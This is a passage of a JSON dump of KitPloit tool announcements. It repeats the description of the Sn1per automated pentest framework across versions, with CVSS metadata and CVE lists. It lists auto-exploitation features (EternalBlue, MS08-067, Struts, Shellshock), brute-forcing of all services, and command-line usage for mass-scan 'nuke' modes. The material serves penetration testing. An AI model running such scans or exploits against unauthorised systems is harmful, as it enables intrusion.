Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n**Categorized host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Personalized notes field for each host** \n \n\n\n[](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n**DEMO VIDEO:** \n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * * Automatically collects basic recon (ie. 
whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**AUTO-PWN:** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600\n * GPON Router RCE CVE-2018-10561\n * [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638\n * Apache Struts 2 RCE CVE-2017-9805\n * Apache Jakarta RCE CVE-2017-5638\n * Shellshock GNU Bash RCE CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * Default Apache Tomcat Creds CVE-2009-3843\n * MS Windows SMB RCE MS08-067\n * Webmin File Disclosure CVE-2006-3392\n * [Anonymous 
FTP](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access\n * PHPMyAdmin Backdoor RCE\n * PHPMyAdmin Auth Bypass\n * JBoss Java De-Serialization RCE's\n \n**KALI LINUX INSTALL:** \n\n \n \n ./install.sh\n\n \n**DOCKER INSTALL:** \nCredits: @menzow \nDocker Install: <https://github.com/menzow/sn1per-docker> \nDocker Build: <https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/> \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] 
UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). 
Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **UPDATE:** Checks for updates and upgrades all components used by sniper.\n * **REIMPORT:** Reimport all workspace files into Metasploit and reproduce all reports.\n * **RELOAD:** Reload the master workspace report.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per v5.0](<https://github.com/1N3/Sn1per>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-11-24T12:43:00", "type": "kitploit", "title": "Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2017-5638", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-7600"], "modified": "2018-11-24T12:43:00", "id": "KITPLOIT:8672599587089685905", "href": 
"http://www.kitploit.com/2018/11/sn1per-v60-automated-pentest-framework.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T12:04:42", "description": "[](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n**Categorized host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Personalized notes field for each host** \n \n\n\n[](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n 
\n \n**DEMO VIDEO:** \n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**AUTO-PWN:** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600\n * GPON Router RCE CVE-2018-10561\n * [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638\n * Apache Struts 2 RCE CVE-2017-9805\n * Apache Jakarta RCE CVE-2017-5638\n * Shellshock GNU Bash RCE CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * 
Default Apache Tomcat Creds CVE-2009-3843\n * MS Windows SMB RCE MS08-067\n * Webmin File Disclosure CVE-2006-3392\n * [Anonymous FTP](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access\n * PHPMyAdmin Backdoor RCE\n * PHPMyAdmin Auth Bypass\n * JBoss Java De-Serialization RCE's\n \n**KALI LINUX INSTALL:** \n\n \n \n ./install.sh\n\n \n**DOCKER INSTALL:** \nCredits: @menzow \nDocker Install: <https://github.com/menzow/sn1per-docker> \nDocker Build: <https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/> \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT 
IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). 
Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **UPDATE:** Checks for updates and upgrades all components used by sniper.\n * **REIMPORT:** Reimport all workspace files into Metasploit and reproduce all reports.\n * **RELOAD:** Reload the master workspace report.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per v5.0](<https://github.com/1N3/Sn1per>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-07-05T13:45:00", "type": "kitploit", "title": "Sn1per v5.0 - Automated Pentest Recon Scanner", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2017-5638", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-7600"], "modified": "2018-07-05T13:45:01", "id": "KITPLOIT:7835941952769002973", "href": "http://www.kitploit.com/2018/07/sn1per-v50-automated-pentest-recon.html", "cvss": 
{"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T12:03:55", "description": "[](<https://1.bp.blogspot.com/-Poffj1hNPBk/XNXfkZuyGfI/AAAAAAAAO0U/k4nQgdLXOoEZMOGlGb3wgnx8HgQzEtacgCLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner> \"automated scanner\" ) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test> \"penetration test\" ) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding Sn1per Professional, go to [https://xerosecurity.com](<https://xerosecurity.com/> \"https://xerosecurity.com\" ).\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://2.bp.blogspot.com/-HnwS8O0KEik/XNXfrGJWPeI/AAAAAAAAO0Y/94Hl4CC3M_kytYKkKldzXNviz4ff92TVACLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://2.bp.blogspot.com/-coOpsZX0XMM/XNXfuVNicUI/AAAAAAAAO0c/Wd2EQSAcI4Uti3bkaa1kxqajpStfjTK0ACLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://4.bp.blogspot.com/-bfzb6vLbCks/XNXfy5vfkTI/AAAAAAAAO0g/9aO7_9YKrqMyWK3PehtfItlm4DZ6KWR4gCLcBGAs/s1600/Sn1per_10.png>)\n\n \n**Detailed host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-JbxR5Z-2O_4/XNXf2YbT_DI/AAAAAAAAO0o/w8Hin6Cbf1Ue4QbVW70T2-r1Rj82wDsSQCLcBGAs/s1600/Sn1per_11.png>)\n\n \n**NMap HTML host reports** \n \n\n\n[](<https://2.bp.blogspot.com/-TYr4tFOy7Y4/XNXf7dXeSII/AAAAAAAAO0w/0YMKst5KHGoygojHG2r6tJxqkg2a-w1YQCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Quick links to online recon tools and Google hacking queries** \n 
\n\n\n[](<https://1.bp.blogspot.com/-FNe1YF5mg68/XNXgAPQOAEI/AAAAAAAAO00/5uuuQo2KqRgwpTE11Z-U6p_XGetjCf9vgCLcBGAs/s1600/Sn1per_13.png>)\n\n \n**Takeovers and Email Security** \n \n\n\n[](<https://2.bp.blogspot.com/-FNah2OwM_nU/XNXgEeJZG9I/AAAAAAAAO08/A7lu1554nJ0GpEOj7AtdZ_emSoyq5lBxQCLcBGAs/s1600/Sn1per_14.png>)\n\n \n**HTML5 Notepad** \n \n\n\n[](<https://2.bp.blogspot.com/-DHOnECOz-T0/XNXgH_QX4JI/AAAAAAAAO1E/s0bFVC-Uf_87tBFY2AJwiJyHgKJ8VgKXQCLcBGAs/s1600/Sn1per_15.png>)\n\n \n**ORDER SN1PER PROFESSIONAL:** \nTo obtain a Sn1per Professional license, go to [https://xerosecurity.com](<https://xerosecurity.com/> \"https://xerosecurity.com\" ). \n \n**DEMO VIDEO:** \n \n \n\n\n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>)\n\n \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, 
MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**EXPLOITS:** \n\n\n * Drupal RESTful Web Services unserialize() SA-CORE-2019-003\n * Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts\n * Drupal: CVE-2018-7600: [Remote Code Execution](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) \\- SA-CORE-2018-002\n * GPON Routers - Authentication Bypass / [Command Injection](<https://www.kitploit.com/search/label/Command%20Injection> \"Command Injection\" ) CVE-2018-10561\n * MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption\n * Apache Tomcat: Remote Code Execution (CVE-2017-12617)\n * Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271\n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)\n * Apache Struts 2 Framework Checks - REST plugin with XStream handler (CVE-2017-9805)\n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)\n * Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269\n * ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249\n * Shellshock Bash Shell remote code execution CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387)\n * Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843\n * MS08-067 Microsoft Server Service Relative Path Stack Corruption\n * Webmin File Disclosure CVE-2006-3392\n * VsFTPd 2.3.4 Backdoor\n * ProFTPd 1.3.3C Backdoor\n * MS03-026 Microsoft RPC DCOM Interface Overflow\n * DistCC Daemon Command Execution\n * JBoss Java De-Serialization\n * HTTP 
Writable Path PUT/DELETE File Access\n * Apache Tomcat User Enumeration\n * Tomcat Application Manager Login Bruteforce\n * Jenkins-CI Enumeration\n * HTTP WebDAV Scanner\n * Android Insecure ADB\n * Anonymous FTP Access\n * PHPMyAdmin Backdoor\n * PHPMyAdmin Auth Bypass\n * OpenSSH User Enumeration\n * LibSSH Auth Bypass\n * SMTP User Enumeration\n * Public NFS Mounts\n \n**KALI LINUX INSTALL:** \n\n \n \n bash install.sh\n\n \n**UBUNTU/DEBIAN/PARROT INSTALL:** \n\n \n \n bash install_debian_ubuntu.sh\n\n \n**DOCKER INSTALL:** \n\n \n \n docker build Dockerfile\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON + FULL PORT SCAN + BRUTE FORCE\n sniper -t|--target <TARGET> -o|--osint -re|--recon -fp|--fullportonly -b|--bruteforce\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORKSPACE_ALIAS>\n \n [*] FLYOVER MODE\n sniper -t|--target <TARGET> -m|--mode flyover -w|--workspace <WORKSPACE_ALIAS>\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f|--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT HTTP MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT HTTPS MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] WEBSCAN 
MODE\n sniper -t|--target <TARGET> -m|--mode webscan\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] LOOT REIMPORTALL FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimportall\n \n [*] DELETE WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -d\n \n [*] DELETE HOST FROM WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh\n \n [*] SCHEDULED SCANS\n sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly\n \n [*] SCAN STATUS\n sniper --status\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **FLYOVER:** Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly).\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (e.g. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). 
